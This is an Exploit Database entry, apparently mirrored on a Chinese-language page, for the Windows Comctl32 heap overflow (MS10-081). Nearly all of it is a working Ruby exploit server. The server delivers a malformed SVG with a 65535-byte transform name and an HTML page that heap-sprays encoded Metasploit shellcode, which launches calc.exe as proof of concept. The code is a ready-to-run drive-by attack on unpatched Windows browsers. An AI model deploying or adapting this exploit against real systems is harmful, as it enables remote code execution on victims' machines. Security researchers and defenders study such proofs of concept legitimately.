Microsoft Windows – Common Control Library ‘Comctl32’ Heap Overflow (MS10-081)

• Exploit Database
• 9 阅读

• 作者： Nephi Johnson
  日期： 2011-01-10
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15963/

• #!/usr/bin/env ruby
   
  # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
  # Nephi Johnson
  
  require 'socket'
  
  def http_send(sock, data, opts={})
  defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
  opts = defaults.merge(opts)
  
  code = opts[:code]
  message = opts[:message]
  type = opts[:type]
  
  date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
  headers = "HTTP/1.1 #{code} #{message}\r\n" +
  "Date: #{date_str}\r\n" +
  "Content-Length: #{data.length}\r\n" +
  "Content-Type: #{type}\r\n\r\n"
  puts "[+] Sending #{opts[:desc]}"
  sock.write(headers + data) rescue return false
  return true
  end
   
  def sock_read(sock, out_str, timeout=5)
  begin
  if Kernel.select([sock],[],[],timeout)
  out_str.replace(sock.recv(1024))
  puts "[+] Received:"
  puts "" + out_str.split("\n")[0]
  return true
  else
  sock.close
  return false
  end
  rescue Exception => ex
  return false
  end
  end
  
  port = ARGV[0] || 55555
  
  transform_name = "\x21" * 65535
  
  svg = <<-SVG
  <?xml version="1.0"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  
  <rect x="50" y="50" height="110" width="110"
  style="fill: #ffffff"
  transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
  >
  </rect>
  <text x="100" y="100">CLICK ME</text>
  </svg>
  SVG
  
  html = <<-HTML
  <html>
  <body>
  <script>
  <!--
  function str_dup(str, length) {
  var result = str;
  while(result.length < length) {
  result += result;
  }
  return result.substr(result.length - length);
  }
  
  var shellcode = unescape("%u9000%u9090%u9090") +
  // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
  unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
   "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
   "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
   "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
   "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
   "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
   "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
   "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
   "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
   "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
   "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
   "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
   "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
   "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
   "%u7c96%u0e88");
  var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
  var arr = [];
  for(var i = 0; i < 2000; i++) {
  arr[i] = document.createElement("a");
  arr[i].innerHTML = [base + shellcode].join("");
  }
  -->
  </script>
  <iframe width="100%" height="100%" src="https://www.exploit-db.com/exploits/15963/poc.svg" marginheight="0" marginwidth="0"></iframe>
  </body>
  </html>
  HTML
  
  puts "[+] Listening on port #{port}"
  puts
  
  TCPServer.open(port) do |srv|
  while true
  cli = srv.accept
  req = ""
  next unless sock_read(cli, req, 5)
  while req.length > 0
  if req =~ /GET.*svg/i
  break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
  elsif req =~ /QUIT/
  exit()
  else
  break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
  end
  req = ""
  next unless sock_read(cli, req, 5)
  end
  cli.close rescue next
  end
  end